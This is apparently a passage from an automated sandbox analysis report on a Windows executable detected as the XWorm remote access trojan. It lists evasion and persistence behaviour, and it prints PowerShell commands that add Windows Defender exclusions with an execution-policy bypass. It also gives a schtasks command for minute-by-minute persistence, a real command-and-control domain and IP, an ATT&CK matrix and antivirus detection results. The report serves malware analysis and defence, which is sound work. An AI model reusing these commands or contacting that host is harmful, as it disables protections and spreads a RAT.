            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\PjGz899RZV.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeThread delayed: delay time: 922337203685477
            Source: PjGz899RZV.exe, 00000000.00000002.3418645293.000000001AF90000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: PjGz899RZV.exe, 00000000.00000002.3418645293.000000001AFE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\PjGz899RZV.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'Jump to behavior
            Bypasses PowerShell execution policy
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe'Jump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe"Jump to behavior
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
            Source: C:\Users\user\Desktop\PjGz899RZV.exeQueries volume information: C:\Users\user\Desktop\PjGz899RZV.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\PjGz899RZV.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeQueries volume information: C:\Users\user\AppData\Roaming\PjGz899RZV.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeQueries volume information: C:\Users\user\AppData\Roaming\PjGz899RZV.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeQueries volume information: C:\Users\user\AppData\Roaming\PjGz899RZV.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeQueries volume information: C:\Users\user\AppData\Roaming\PjGz899RZV.exe VolumeInformation
            Source: C:\Users\user\Desktop\PjGz899RZV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: PjGz899RZV.exe, 00000000.00000002.3418645293.000000001B018000.00000004.00000020.00020000.00000000.sdmp, PjGz899RZV.exe, 00000000.00000002.3418645293.000000001B051000.00000004.00000020.00020000.00000000.sdmp, PjGz899RZV.exe, 00000000.00000002.3385846383.00000000006AC000.00000004.00000020.00020000.00000000.sdmp, PjGz899RZV.exe, 00000000.00000002.3385846383.0000000000636000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\PjGz899RZV.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\PjGz899RZV.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\PjGz899RZV.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\Desktop\PjGz899RZV.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: PjGz899RZV.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.PjGz899RZV.exe.e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PjGz899RZV.exe PID: 4236, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, type: DROPPED

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: PjGz899RZV.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.PjGz899RZV.exe.e0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: PjGz899RZV.exe PID: 4236, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		12
            Process Injection            		1
            Masquerading            		1
            Input Capture            		121
            Security Software Discovery            		Remote Services1
            Input Capture            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		21
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            PowerShell            		1
            DLL Side-Loading            		21
            Registry Run Keys / Startup Folder            		31
            Virtualization/Sandbox Evasion            		Security Account Manager31
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		12
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture11
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579065 Sample: PjGz899RZV.exe Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 40 below-communist.gl.at.ply.gg 2->40 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 11 other signatures 2->50 8 PjGz899RZV.exe 1 8 2->8         started        13 PjGz899RZV.exe 2->13         started        15 PjGz899RZV.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 42 below-communist.gl.at.ply.gg 147.185.221.24, 38116, 49801, 49858 SALSGIVERUS United States 8->42 36 C:\Users\user\AppData\...\PjGz899RZV.exe, PE32 8->36 dropped 54 Protects its processes via BreakOnTermination flag 8->54 56 Bypasses PowerShell execution policy 8->56 58 Uses schtasks.exe or at.exe to add and modify task schedules 8->58 60 Adds a directory exclusion to Windows Defender 8->60 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 schtasks.exe 1 8->26         started        38 C:\Users\user\AppData\...\PjGz899RZV.exe.log, CSV 13->38 dropped 62 Antivirus detection for dropped file 13->62 64 Multi AV Scanner detection for dropped file 13->64 66 Machine Learning detection for dropped file 13->66 file6 signatures7 process8 signatures9 52 Loading BitLocker PowerShell Module 19->52 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            PjGz899RZV.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT
            PjGz899RZV.exe100%AviraTR/Spy.Gen
            PjGz899RZV.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\PjGz899RZV.exe100%AviraTR/Spy.Gen
            C:\Users\user\AppData\Roaming\PjGz899RZV.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\PjGz899RZV.exe82%ReversingLabsByteCode-MSIL.Backdoor.XWormRAT

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            below-communist.gl.at.ply.gg
            		147.185.221.24
            		truetrue
              		unknown

              Contacted URLs

